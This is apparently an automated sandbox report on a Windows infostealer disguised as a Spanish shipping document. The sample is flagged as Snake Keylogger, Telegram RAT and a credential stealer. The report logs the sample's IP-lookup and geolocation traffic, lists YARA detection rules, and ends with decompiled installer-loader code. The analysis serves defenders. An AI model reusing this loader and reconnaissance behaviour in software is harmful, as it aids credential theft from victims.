                      Sep 27, 2021 19:44:00.454566956 CEST49741443192.168.2.5104.21.19.200
                      Sep 27, 2021 19:44:00.454607010 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:00.501405954 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:00.501524925 CEST49741443192.168.2.5104.21.19.200
                      Sep 27, 2021 19:44:00.506860018 CEST49741443192.168.2.5104.21.19.200
                      Sep 27, 2021 19:44:00.506887913 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:00.507334948 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:00.550594091 CEST49741443192.168.2.5104.21.19.200
                      Sep 27, 2021 19:44:01.994297028 CEST49741443192.168.2.5104.21.19.200
                      Sep 27, 2021 19:44:02.035144091 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:02.056082010 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:02.056166887 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:02.056307077 CEST49741443192.168.2.5104.21.19.200
                      Sep 27, 2021 19:44:02.060013056 CEST49741443192.168.2.5104.21.19.200

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 27, 2021 19:43:42.217348099 CEST6206053192.168.2.58.8.8.8
                      Sep 27, 2021 19:43:42.238398075 CEST53620608.8.8.8192.168.2.5
                      Sep 27, 2021 19:43:53.645126104 CEST6180553192.168.2.58.8.8.8
                      Sep 27, 2021 19:43:53.683273077 CEST53618058.8.8.8192.168.2.5
                      Sep 27, 2021 19:43:58.510322094 CEST5479553192.168.2.58.8.8.8
                      Sep 27, 2021 19:43:58.523349047 CEST53547958.8.8.8192.168.2.5
                      Sep 27, 2021 19:43:58.534156084 CEST4955753192.168.2.58.8.8.8
                      Sep 27, 2021 19:43:58.546883106 CEST53495578.8.8.8192.168.2.5
                      Sep 27, 2021 19:44:00.354196072 CEST6173353192.168.2.58.8.8.8
                      Sep 27, 2021 19:44:00.374561071 CEST53617338.8.8.8192.168.2.5
                      Sep 27, 2021 19:44:13.677108049 CEST6544753192.168.2.58.8.8.8
                      Sep 27, 2021 19:44:13.691576004 CEST53654478.8.8.8192.168.2.5
                      Sep 27, 2021 19:44:30.873433113 CEST5244153192.168.2.58.8.8.8
                      Sep 27, 2021 19:44:30.893045902 CEST53524418.8.8.8192.168.2.5
                      Sep 27, 2021 19:44:35.501491070 CEST6217653192.168.2.58.8.8.8
                      Sep 27, 2021 19:44:35.534218073 CEST53621768.8.8.8192.168.2.5
                      Sep 27, 2021 19:44:49.152272940 CEST5959653192.168.2.58.8.8.8
                      Sep 27, 2021 19:44:49.180003881 CEST53595968.8.8.8192.168.2.5
                      Sep 27, 2021 19:44:51.560977936 CEST6529653192.168.2.58.8.8.8
                      Sep 27, 2021 19:44:51.588670969 CEST53652968.8.8.8192.168.2.5
                      Sep 27, 2021 19:45:25.898906946 CEST6318353192.168.2.58.8.8.8
                      Sep 27, 2021 19:45:25.926074982 CEST53631838.8.8.8192.168.2.5
                      Sep 27, 2021 19:45:27.594351053 CEST6015153192.168.2.58.8.8.8
                      Sep 27, 2021 19:45:27.628565073 CEST53601518.8.8.8192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Sep 27, 2021 19:43:58.510322094 CEST192.168.2.58.8.8.80xcbd0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.534156084 CEST192.168.2.58.8.8.80x4482Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                      Sep 27, 2021 19:44:00.354196072 CEST192.168.2.58.8.8.80x13d6Standard query (0)freegeoip.appA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.523349047 CEST8.8.8.8192.168.2.50xcbd0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                      Sep 27, 2021 19:43:58.546883106 CEST8.8.8.8192.168.2.50x4482No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                      Sep 27, 2021 19:44:00.374561071 CEST8.8.8.8192.168.2.50x13d6No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                      Sep 27, 2021 19:44:00.374561071 CEST8.8.8.8192.168.2.50x13d6No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • freegeoip.app
                      • checkip.dyndns.org

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.549741104.21.19.200443C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.549739216.146.43.7080C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      TimestampkBytes transferredDirectionData
                      Sep 27, 2021 19:43:58.736373901 CEST943OUTGET / HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                      Host: checkip.dyndns.org
                      Connection: Keep-Alive
                      Sep 27, 2021 19:43:58.775068998 CEST943INHTTP/1.1 200 OK
                      Content-Type: text/html
                      Server: DynDNS-CheckIP/1.0.1
                      Connection: close
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Length: 106
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.189.150.72</body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.549740216.146.43.7080C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      TimestampkBytes transferredDirectionData
                      Sep 27, 2021 19:43:58.981575012 CEST944OUTGET / HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                      Host: checkip.dyndns.org
                      Sep 27, 2021 19:43:59.020028114 CEST944INHTTP/1.1 200 OK
                      Content-Type: text/html
                      Server: DynDNS-CheckIP/1.0.1
                      Connection: close
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Length: 106
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.189.150.72</body></html>


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.549741104.21.19.200443C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      TimestampkBytes transferredDirectionData
                      2021-09-27 17:44:01 UTC0OUTGET /xml/185.189.150.72 HTTP/1.1
                      Host: freegeoip.app
                      Connection: Keep-Alive
                      2021-09-27 17:44:02 UTC0INHTTP/1.1 200 OK
                      Date: Mon, 27 Sep 2021 17:44:02 GMT
                      Content-Type: application/xml
                      Content-Length: 350
                      Connection: close
                      vary: Origin
                      x-database-date: Wed, 25 Aug 2021 10:15:20 GMT
                      x-ratelimit-limit: 15000
                      x-ratelimit-remaining: 14998
                      x-ratelimit-reset: 2021
                      CF-Cache-Status: DYNAMIC
                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xnIrddQbAR28rsEF6vjI0LTXIR0OyKzGTsgbVIshtcb6P0qiDek0%2BEApD7d7R2SVsQKvnw5gNulz6f%2BGC0%2FiT7xBCKIc8V2AAdgEuu4piJcU%2BbbAI%2B8dhI0npTANiPvL"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 695689a48d7c3756-MXP
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      2021-09-27 17:44:02 UTC0INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 48 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 53 77 69 74 7a 65 72 6c 61 6e 64 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 5a 48 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 5a 75 72 69 63 68 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 5a 75 72 69 63 68 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 30 39 30 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61
                      Data Ascii: <Response><IP>185.189.150.72</IP><CountryCode>CH</CountryCode><CountryName>Switzerland</CountryName><RegionCode>ZH</RegionCode><RegionName>Zurich</RegionName><City>Zurich</City><ZipCode>8090</ZipCode><TimeZone>Europe/Zurich</TimeZone><La


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: GU#U00cdA DE CARGA...exe PID: 2848 Parent PID: 900

                      General

                      Start time:19:43:47
                      Start date:27/09/2021
                      Path:C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe'
                      Imagebase:0x400000
                      File size:325929 bytes
                      MD5 hash:FCCE8F5A7E5FCDF78C02D6543C1AF2BD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      Chronological Activities

                      Analysis Process: GU#U00cdA DE CARGA...exe PID: 400 Parent PID: 2848

                      General

                      Start time:19:43:49
                      Start date:27/09/2021
                      Path:C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe'
                      Imagebase:0x400000
                      File size:325929 bytes
                      MD5 hash:FCCE8F5A7E5FCDF78C02D6543C1AF2BD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                      Reputation:low

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >

                        Analysis Process: GU#U00cdA DE CARGA...exe PID: 2848 Parent PID: 900 GU#U00cdA DE CARGA...exeCOMMON

                        Executed Functions

                        Function 0040312A, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x6e1110
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\GU#U00cdA DE CARGA...exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x6e1110
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("dah Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\alfons\\Desktop\\GU#U00cdA DE CARGA...exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\alfons\\Desktop\\GU#U00cdA DE CARGA...exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                        0x0040313b
                        0x0040313f
                        0x00403147
                        0x0040314b
                        0x00403150
                        0x00403160
                        0x00403163
                        0x0040316a
                        0x00403171
                        0x00403171
                        0x0040316a
                        0x00403173
                        0x00403173
                        0x00403289
                        0x00403289
                        0x00403289
                        0x0040328b
                        0x0040328d
                        0x00000000
                        0x00000000
                        0x00403222
                        0x00403225
                        0x0040322d
                        0x0040322d
                        0x00403230
                        0x00403235
                        0x00403237
                        0x00403237
                        0x00403238
                        0x00403238
                        0x0040323d
                        0x00403240
                        0x00403279
                        0x0040327e
                        0x00403283
                        0x00403286
                        0x00403288
                        0x00403288
                        0x00403288
                        0x00000000
                        0x00403242
                        0x00403242
                        0x00403243
                        0x00403246
                        0x0040324e
                        0x00403251
                        0x00403253
                        0x00403253
                        0x00403253
                        0x00403253
                        0x00403251
                        0x00403258
                        0x0040325e
                        0x00403266
                        0x00403269
                        0x0040326b
                        0x0040326b
                        0x0040326b
                        0x0040326b
                        0x00403269
                        0x00403270
                        0x00403277
                        0x00403291
                        0x00403294
                        0x00403294
                        0x0040329d
                        0x004032a2
                        0x004032a2
                        0x004032ad
                        0x004032b3
                        0x004032b8
                        0x004032ba
                        0x004032e0
                        0x004032e5
                        0x004032ef
                        0x004032f6
                        0x004032fa
                        0x00403361
                        0x00403361
                        0x00403366
                        0x0040336c
                        0x00403370
                        0x00403485
                        0x0040348b
                        0x00403528
                        0x00403528
                        0x0040352d
                        0x00403530
                        0x00403532
                        0x00403532
                        0x0040353a
                        0x0040353a
                        0x0040349a
                        0x004034a3
                        0x004034a5
                        0x004034aa
                        0x004034ac
                        0x004034ae
                        0x004034b0
                        0x004034b2
                        0x004034b4
                        0x004034b6
                        0x004034c6
                        0x004034c8
                        0x004034ca
                        0x004034d7
                        0x004034e6
                        0x004034ee
                        0x004034f6
                        0x004034f6
                        0x004034ca
                        0x004034b6
                        0x004034b2
                        0x004034fa
                        0x004034ff
                        0x00403506
                        0x00403514
                        0x00403517
                        0x0040351d
                        0x0040351f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403508
                        0x0040350e
                        0x00403510
                        0x00403512
                        0x00403521
                        0x00403523
                        0x00000000
                        0x00403523
                        0x00000000
                        0x00403512
                        0x00403506
                        0x0040337f
                        0x00403386
                        0x00403386
                        0x004032fc
                        0x00403302
                        0x00403351
